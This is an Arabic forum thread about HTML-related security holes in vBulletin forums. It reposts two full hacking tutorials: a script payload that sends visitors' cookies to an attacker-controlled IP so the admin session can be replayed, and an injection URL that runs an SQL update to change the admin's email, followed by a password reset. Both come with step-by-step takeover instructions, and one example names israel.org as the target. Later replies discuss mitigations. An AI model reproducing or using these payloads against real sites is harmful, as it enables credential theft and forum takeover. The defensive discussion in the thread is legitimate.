امر مهم يجب النقاش فيه بخصوص منتدى VB والثغرة الأمنية عن طريق HTML

[live]

السلام عليكم

لا اعلم ان كان هذا الأمر قد طرح من قبل ، فلقد بحثت في سوالف كي اقرأ في هذا الموضوع فلم اجد ما يشفي الصدور .


بدون مقدمات :

ميزة أو خاصية HTML خاصية جميلة وقد يحتاجها رواد المنتدى في موضوعاتهم ، بل انها تعتبر كـخدمة للمشارك من طرف صاحب المنتدى

فلماذا يتم غلق هذه الخاصية واعدامها مع وجودها وحرمان المشاركين من التعامل معها ؟؟


سيقول البعض : ( عن طريقها يمكن لأي شخص الدخول للموقع واختراقه ) فهل هذا صحيح !!!؟؟


ولكن كيف هذا هو السؤال !!!

عفوا .. لا اريد من هذا الموضوع اثارة بلبلة ولا اقصد والله ان يضع احدهم الطريقة هنا ، ولكن لماذا لا يخاطب العارف بهذه الثغرة الشركة بهذا الخصوص ، لماذا لا يرسل الطريقة لأخواننا الثقات حتى يتم سد هذه الثغرات !!

هذه قضية يجب ان نتداركها ، فالى متى سنظل مقيدين بعدم استعمال خاصية الهتمل بسبب انها ( ثغرة ) .


اليس هناك من حل ، فلنحاول ان نحل هذه المشكلة قدر استطاعتنا ولنناقش ماهي الاوامر التي من خلالها يمكن العبث بالمنتدى أو الدخول ، وما الذي يستطع فعله لمخترق بسبب هذه الخاصية ( حتى انا لا اعلم )

نسمع فقط ويتكرر الى أذهاننا ( اغلق خاصية الهتمل ) فقد يتم اختراق المنتدى بسببها

هل من الممكن ان نعرف مالذي يمكن ان يقوم به ( المخترق ) إذا استطاع ذلك فعلا ...

يعني بالعربي هل يستطيع مسح المواضيع ، الاطلاع على كلمات المرور ، الكتابة في المنتدى دون التسجيل ، الدخول على لوحة التحكم !!

اجيييييييييييييييييييييييبوووووووووني

والله يا جماعة الأمر جد خطير ويجب ان لا نتساهل معه على الاطلاق


أرجو من الاخوة الادلاء برأيهم وخصوصا خبراء المنتديات والعثور على حل لهذا الأمر بأسرع وقت ممكن ، فلقد مللنا سد الثغرات بطريقة ( الهروب ) .


وفق الله الجميع

[fantom6]

اخوي مباشر

وانا جالس اقراء في المنتديات حصلت موضوعين عن اختراق شفرة HTML

وياليت الاخوان ما يطبقونه او يستخدمونه ولا ادري هي طريقه صحيحه ولا لا

الحمدانا شفت الموضوع ولا طبقته علي اي منتدي

بس حاب كيف اوريكم المواضيع الي نطرحت وياليت اذا فيها مشكله ان الاخوان يعالجونها



الآن إخترق المنتديات من نوع vBulletin ..!!
بسم الله الرحمن الرحيم ..

يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...

---------
مقدمة :
---------

الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط

ملاحظة : هذه الطريقة لست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<script>document.write('<img
src="http://my_ip_address/'+document.cookie+'">';</script>

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb



ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54


20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

الطريقة الثانية


هذي الطريقه الي تخترق فيها المنتديات تفضل ...بالتفصيل الممل

1. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

أو العنوان التفصيلي التالي :
http://URL/memberlist.php

URL = العنوان المستضيف للمنتدى

مثل = israel.org

4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

http://URL/member.php?soitgoe68e45u...info&userid=266

هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

http://URL/member.php?soitgoe68e45u...etinfo&userid=1

العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

http://URL/member.php?action=login&...VALIDPASS&url=\");".$users=$DB_site->query("update+user+set+email='YOUR@EMAIL.HERE'+WHERE+username='ADMIN'")."

العنوان هذا ستقوم بتغيير الكلمات التالية

URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .

8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php

ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

بالطيع ستظهر لك الصفحة التعيسة التي تقول :

أنت قمت بكتابة كلمة سر خاطئة

you typed in the wrong password


9. بكل بساطة أضغط على

نسيت كلمة السر
forgot password

والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى



ارجاء من الاخوان عدك استخدامها

[here]

الأخ live
أنا طرحت هذه القضية لكن ما أحد رد علي !

الأخ fantom6
بالنسبة للطريقة الثانية أظنها تحلت .. وجرب .. عندك المنتديات وشوف
وعلى كل حال ليس لها دخل بال html

أما الأولى فمحلولة .. بأن تلغي
<script>
يعني تحول كل
<script
إلى
<script1

تضيف 1 أو أي رقم ..

وهذا ما يفعله بريد hotmail وغيره ..

هل هناك طريقة أخرى للاختراق غير هذه فيما يتعلق بال html

[satam]

اغلق html
والي تحتاجه منه تستطيع تعمله في vbcod اسهل واسلم

تحياتي

[live]

الاخ الفاضل fantom6

اشكر لك هذه المشاركة ، والحقيقة ان ما ذكرت امر مهم


اخي الفاضل here

دعني اولا اشكرك جزيل الشكر على ما قدمت وما زلت تقدم ، ويكفي ان بصمات اعمالك في كل منتدى عربي . فجزاك الله كل خير


اخي الفاضل قلت في ردك الكريم :

بالنسبة للطريقة الثانية أظنها انحلت .. وجرب .. عندك المنتديات وشوف
وعلى كل حال ليس لها دخل بال html

نعم هي ليس لها دخل ابدا بالهتمل إلا ان الاخ جزاه الله خيرا اراد ان يشمل طرق الاختراق ، وهذا امر جيد ، وطالما ان المسألة قد تم حلها فالحمدلله .

ولكن هل حلها يكون باغلاق رابط الاعضاء !! أم ان الحل جاء عن طريق الشركة مع النسخ الجديدة للفي بي ؟؟


قلت ايضا :


أما الأولى فمحلولة .. بأن تلغي
<script>
يعني تحول كل
<script
إلى
<script1

تضيف 1 أو أي رقم ..


هل لك حفظك الله ان تشرح هذا الأمر ، وان كنت قد ذكرته في موضوع سابق فحبذا لو وضعت الرابط واكون ممنون لك .



اخي satam
كلامك صحيح بأن الفي بي كود اسهل وتقريبا متكامل

لكن إلا تظن معي بأننا عدنا مرة اخرى للهروب



اشكر لكم جميعا هذه المداخلة .